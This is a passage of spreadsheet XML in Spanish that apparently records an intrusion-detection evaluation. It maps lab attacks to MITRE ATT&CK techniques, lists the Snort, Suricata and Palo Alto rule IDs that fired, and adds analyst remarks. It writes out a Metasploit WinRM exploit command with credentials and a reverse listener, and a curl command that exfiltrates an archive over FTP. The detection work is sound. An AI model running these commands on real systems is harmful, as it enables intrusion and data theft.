1161, 1202, 1030, 1040, 60573, 887, 878, 1038, 1022, 1077, 1078, 946, 1075, 984, 1073, 851, 1127, 50921, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 2144, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 43289, 2204, 2205, 2206, 1637, 1142, 2073, 2225, 31377, 2130, 2131, 1997, 2214, 1037, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 879, 950, 1542, 944, 943, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1005, 1559, 55647, 1119, 1120, 908, 1816, 1614, 2395, 1871, 2326, 2196, 954, 948, 1851, 1110, 1489, 818, 1032, 1043, 1033, 1034, 1035, 1036, 1031, 2142, 1527, 1526, 902, 2198, 1520, 1209, 1557, 1555, 1770, 1769, 33613, 33612, 1873, 1522, 1523, 1004, 895, 21515, 2393, 50923, 50924, 50925, 50922, 41817, 2276, 25977, 21516, 59258, 20663, 31360, 59332, 20654, 27218, 2295, 28912, 31637, 20631, 20632, 20633, 27230, 31362, 28957, 27192, 20815, 16613, 27688, 43724, 43691, 20656, 1671, 20728, 20731, 2363, 1399, 31638, 1091, 20651, 20826, 44133, 2285, 2140, 31419, 2410, 886, 2281, 43392, 18478, 27284, 20732, 2288, 2298, 1254, 31568, 24502, 23362, 22097, 22064, 43285
</t>
  </si>
  <si>
    <t xml:space="preserve">2002752, 2002749, 2002677, 2101071, 2101242, 2027262, 2016141, 2003595, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006609, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160, 43238, 50447, 1071, 1242, 1131, 1130, 1044, 1129, 987, 41188, 20173, 1245, 977, 971, 41187, 1880, 1852, 1145, 300003, 18742, 2056, 913, 914, 912, 41742, 985, 1400, 962, 1288, 853, 2152, 1738, 1875, 1301, 2002, 8492, 918, 43808, 999, 1000, 993, 1486, 1172, 857, 1284, 3201, 986, 1256, 24342, 1016, 1826, 1482, 1567, 1568, 1772, 2076, 1080, 39348, 1128, 1076, 1492, 1493, 1560, 2565, 53017, 1146, 1848, 1148, 1125, 1166, 1286, 1660, 1765, 1528, 1164, 2484, 903, 1551, 2228, 1402, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 56563, 1586, 1577, 1578, 1579, 931, 2246, 1587, 1122, 1002, 992, 1401, 875, 1829, 31940, 911, 1244, 966, 42323, 906, 928, 8493, 1773, 3674, 1517, 45380, 1147, 2154, 1491, 1611, 2000, 1157, 1828, 42465, 1376, 13990, 16431, 31860, 7070, 2077, 20258, 1827, 1231, 20674, 1767, 42289, 1774, 1834, 7071, 1667, 61117, 36037, 2347, 2346, 1835, 1998, 882, 49920, 922, 1659, 1877, 1212, 910, 930, 1722, 1108, 8490, 915, 935, 25975, 1141, 59237, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 38371, 1540, 1250, 2138, 1168, 1407, 1385, 1564, 805, 1726, 940, 937, 952, 967, 1248, 955, 958, 961, 965, 1847, 1175, 1111, 43356, 1592, 43290, 1481, 1521, 1201, 1123, 1183, 1160, 1500, 1013, 807, 1193, 979, 21161, 1023, 1024, 1487, 1018, 2325, 1162, 1134, 1213, 904, 932, 907, 905, 1214, 1215, 1192, 1155, 1556, 1161, 1202, 1030, 1040, 60573, 887, 878, 1038, 1022, 1077, 1078, 946, 1075, 984, 1073, 851, 1127, 50921, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 2144, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 43289, 2204, 2205, 2206, 1637, 1142, 2073, 2225, 31377, 2130, 2131, 1997, 2214, 1037, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 879, 950, 1542, 944, 943, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1005, 1559, 55647, 1119, 1120, 908, 1816, 1614, 2395, 1871, 2326, 2196, 954, 948, 1851, 1110, 1489, 818, 1032, 1043, 1033, 1034, 1035, 1036, 1031, 2142, 1527, 1526, 902, 2198, 1520, 1209, 1557, 1555, 1770, 1769, 33613, 33612, 1873, 1522, 1523, 1004, 895, 21515, 2393, 50923, 50924, 50925, 50922, 41817, 2276, 25977, 21516, 59258, 20663, 31360, 59332, 20654, 27218, 2295, 28912, 31637, 20631, 20632, 20633, 27230, 31362, 28957, 27192, 20815, 16613, 27688, 43724, 43691, 20656, 1671, 20728, 20731, 2363, 1399, 31638, 1091, 20651, 20826, 44133, 2285, 2140, 31419, 2410, 886, 2281, 43392, 18478, 27284, 20732, 2288, 2298, 1254, 31568, 24502, 23362, 22097, 22064, 43285
</t>
  </si>
  <si>
    <t xml:space="preserve">2002677, 2101071, 2101242, 2027262, 2016141, 2003595, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006609, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160, 43238, 50447, 1071, 1242, 1131, 1130, 1044, 1129, 987, 41188, 20173, 1245, 977, 971, 41187, 1880, 1852, 1145, 300003, 18742, 2056, 913, 914, 912, 41742, 985, 1400, 962, 1288, 853, 2152, 1738, 1875, 1301, 2002, 8492, 918, 43808, 999, 1000, 993, 1486, 1172, 857, 1284, 3201, 986, 1256, 24342, 1016, 1826, 1482, 1567, 1568, 1772, 2076, 1080, 39348, 1128, 1076, 1492, 1493, 1560, 2565, 53017, 1146, 1848, 1148, 1125, 1166, 1286, 1660, 1765, 1528, 1164, 2484, 903, 1551, 2228, 1402, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 56563, 1586, 1577, 1578, 1579, 931, 2246, 1587, 1122, 1002, 992, 1401, 875, 1829, 31940, 911, 1244, 966, 42323, 906, 928, 8493, 1773, 3674, 1517, 45380, 1147, 2154, 1491, 1611, 2000, 1157, 1828, 42465, 1376, 13990, 16431, 31860, 7070, 2077, 20258, 1827, 1231, 20674, 1767, 42289, 1774, 1834, 7071, 1667, 61117, 36037, 2347, 2346, 1835, 1998, 882, 49920, 922, 1659, 1877, 1212, 910, 930, 1722, 1108, 8490, 915, 935, 25975, 1141, 59237, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 38371, 1540, 1250, 2138, 1168, 1407, 1385, 1564, 805, 1726, 940, 937, 952, 967, 1248, 955, 958, 961, 965, 1847, 1175, 1111, 43356, 1592, 43290, 1481, 1521, 1201, 1123, 1183, 1160, 1500, 1013, 807, 1193, 979, 21161, 1023, 1024, 1487, 1018, 2325, 1162, 1134, 1213, 904, 932, 907, 905, 1214, 1215, 1192, 1155, 1556, 1161, 1202, 1030, 1040, 60573, 887, 878, 1038, 1022, 1077, 1078, 946, 1075, 984, 1073, 851, 1127, 50921, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 2144, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 43289, 2204, 2205, 2206, 1637, 1142, 2073, 2225, 31377, 2130, 2131, 1997, 2214, 1037, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 879, 950, 1542, 944, 943, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1005, 1559, 55647, 1119, 1120, 908, 1816, 1614, 2395, 1871, 2326, 2196, 954, 948, 1851, 1110, 1489, 818, 1032, 1043, 1033, 1034, 1035, 1036, 1031, 2142, 1527, 1526, 902, 2198, 1520, 1209, 1557, 1555, 1770, 1769, 33613, 33612, 1873, 1522, 1523, 1004, 895, 21515, 2393, 50923, 50924, 50925, 50922, 41817, 2276, 25977, 21516, 59258, 20663, 31360, 59332, 20654, 27218, 2295, 28912, 31637, 20631, 20632, 20633, 27230, 31362, 28957, 27192, 20815, 16613, 27688, 43724, 43691, 20656, 1671, 20728, 20731, 2363, 1399, 31638, 1091, 20651, 20826, 44133, 2285, 2140, 31419, 2410, 886, 2281, 43392, 18478, 27284, 20732, 2288, 2298, 1254, 31568, 24502, 23362, 22097, 22064, 43285
</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Ataque</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: cada URL escaneada se considera como una instancia de ataque independiente                                                            </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Análisis Manual:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
    </r>
  </si>
  <si>
    <t>44780, 12648, 12475, 15229, 10604, 15463, 12699, 12935, 12560, 12426, 12439, 29261, 46767, 29264, 13116, 27560, 43336, 12265, 12015, 13106, 13011, 56146, 14088, 15621, 17702, 10574, 12577, 15221, 12909, 12933, 13056, 12758, 12709, 12459, 24975, 30908, 56270, 12979, 13801, 50825, 12980, 10003, 48010, 15117, 29613, 14946, 15091, 14950, 14957, 14848, 14955, 14857, 14956, 13825, 14305, 14849, 15115, 29615, 15100, 14873, 14847, 14954, 14374, 14740, 14286, 30542, 14405, 14338, 14157, 15116, 15092, 14850, 14942, 14949, 14852, 15118, 29564, 14855, 14859, 14743, 14734, 14742, 14406, 15110, 14953, 14851, 14404, 15114, 14952, 14856, 14341, 14858, 14266, 14736, 14345, 15225, 29614, 14484, 14948, 29965, 31752, 29263, 47202</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Ataque</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: cada URL escaneada se considera como una instancia de ataque independiente.                                                                  </t>
    </r>
  </si>
  <si>
    <t>9999, 30092, 30120, 30323, 30350, 30444, 30510, 30514, 30520, 30798, 30815, 30818, 30844, 30851, 30852, 30853, 30888, 30903, 30914, 30921, 31476, 31477, 31932, 32190, 32194, 32451, 32622, 32658, 32672, 32688, 32689, 32691, 32696, 32701, 32703, 32712, 33327, 33330, 33339, 33467, 33645, 33756, 33779, 33783, 34200, 34439, 34519, 34804, 35010, 35107, 35298, 36096, 36102, 36280, 36315, 38402, 38531, 39455, 39766, 39810, 54469, 54701, 55558, 55834, 58209, 58461, 58618, 90136, 91328, 91655, 92485, 93646, 94328, 94849</t>
  </si>
  <si>
    <t>T1046-Version_services_detection2_[3].pcapng</t>
  </si>
  <si>
    <t>29456, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">384, 453, 408, 451, 1421, 1420, 1418, 257, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>598</t>
    </r>
  </si>
  <si>
    <t>2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598, 2009358, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 29456</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2010939, 2010938, 2010936, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2100257, 2100598, 2009358, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598</t>
    </r>
  </si>
  <si>
    <t>2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598, 2009358, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447, 29456</t>
  </si>
  <si>
    <t>2010937, 2002911, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939, 2010938, 2010936, 2100257, 2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
    </r>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749, 2009582, 2000538, 2100453, 2100408, 2100451, 2010937, 2001689, 2010939, 2010938, 2002911, 2100615, 2010936, 2010935, 2002910, 2101420, 2101418, 2100257, 2100598, 2009358, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
  </si>
  <si>
    <t>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2000538</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2100453, 2100451, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2001689</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101420, 2101418, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100257</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Análisis Manual:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis                                                         </t>
    </r>
  </si>
  <si>
    <t>45360, 43814, 18157</t>
  </si>
  <si>
    <t>proto="tcp" app="incomplete"</t>
  </si>
  <si>
    <t>31914, 32796, 58433, 94317</t>
  </si>
  <si>
    <t>32796, 58433, 94317</t>
  </si>
  <si>
    <t>PaloAlto detecta el uso de NMAP para un escaneo de puertos. El resto de flujos detectados mediante alertas "TRAFFIC" se consideran parte del ataque detectándose mediante Control de Aplicaciones (proto="tcp" app="incomplete" porque no lleva información adicional a nivel de app)</t>
  </si>
  <si>
    <t>65457</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>TA0002</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Ejecución de carga por WinRM</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>T1047-WinRM_[2].pcapng</t>
  </si>
  <si>
    <t>Establecimiento de sesión remota mediante Metasploit - T1059</t>
  </si>
  <si>
    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo aprovechando vulnerabilidades en WinRM</t>
  </si>
  <si>
    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.4.1</t>
  </si>
  <si>
    <t>Manual [4] / B.26</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.1.5</t>
  </si>
  <si>
    <t>El aprovechamiento de la vulnerabilidad de la herramienta WinRM hace que este ataque siempre se comporte como tal (aunque la ejecución de código remoto también pueda darse en contextos legítimos)</t>
  </si>
  <si>
    <t>1394, 2033952, 2035480, 2025644</t>
  </si>
  <si>
    <t>1394, 2033952, 2025644</t>
  </si>
  <si>
    <t>1394, 20619, 2033952, 2035480, 2025644</t>
  </si>
  <si>
    <t>2035480, 20619</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1394, 2033952, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF57BB8A"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
  </si>
  <si>
    <t>1394, 20619, 2033952, 2035480, 2025644, 2002752, 2002749, 2006409, 2000419, 2101620</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101620</t>
  </si>
  <si>
    <t>1394, 20619, 2033952, 2035480, 2025644, 2006409, 2000419</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 20619</t>
    </r>
  </si>
  <si>
    <t>20619, 2006409, 2035480</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: la diferencia recae en el método de identificación de flujos. No hay pérdida de información.                                                             </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snort detecta tanto el ataque como el uso de Metasploit como herramienta auxiliar</t>
    </r>
  </si>
  <si>
    <t>9999, 59997, 90099, 34556, 31708, 40031, 40006</t>
  </si>
  <si>
    <t xml:space="preserve"> 59997, 90099, 34556, 31708, 40031, 40006</t>
  </si>
  <si>
    <t>59997, 90099, 40031. 40006, 9999, 34556, 31708</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltración por FTP</t>
  </si>
  <si>
    <t>T1048.003-Exfiltration_over_FTP_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte FTP STOR</t>
  </si>
  <si>
    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.15</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.5</t>
  </si>
  <si>
    <t>El uso de FTP para enviar datos se corresponde con un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100472, 2003303, 2003410, 2015016,</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100472</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2003303, 2003410,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2015016,</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749, 2100472,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2003303, 2003410,</t>
    </r>
    <r>
      <rPr>
